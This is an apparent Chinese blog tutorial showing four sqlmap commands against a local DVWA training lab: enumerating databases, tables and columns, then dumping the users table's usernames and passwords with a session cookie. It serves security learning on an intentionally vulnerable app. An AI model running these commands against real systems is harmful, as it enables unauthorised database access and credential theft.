zoukankan      html  css  js  c++  java
  • Sqlmap对dvwa进行sql注入测试

    前提准备条件:

    1.下载安装dvwa,下载链接地址:http://www.dvwa.co.uk/。
    2.需要安装python运行环境。
    3.下载sqlmap包并将其解压。


    一、查看所有的数据库;(其中dbs表示显示所有数据库)
    sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch --dbs


    二、查看数据里的所有表:(其中-D dvwa 是选择数据库dvwa)

    sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa --tables

     


    三、查看表中的数据:(其中-T users 选择数据表users)

    sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users --columns

     


    四、查看表中的user表的用户名和密码
    sqlmap -u "http://10.8.88.177:8089/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=impossible;PHPSESSID=paak4uv1ob93v4ptkult39b6p5" --batch -D dvwa -T users -C "user,password" --dump

  • 相关阅读:
    转: wireshark过滤规则
    PHP开发
    转:python安装pycrypto
    How to use pycharm to debug scrapy projects
    VCForPython27.msi安装后, 还显示error: Unable to find vcvarsall.bat
    Dcgpofix
    Dsamain
    组托管服务帐户概述
    创建 PSO
    介绍 Active Directory 域服务 (AD DS) 虚拟化
  • 原文地址:https://www.cnblogs.com/wangyuebo/p/11431245.html
Copyright © 2011-2022 走看看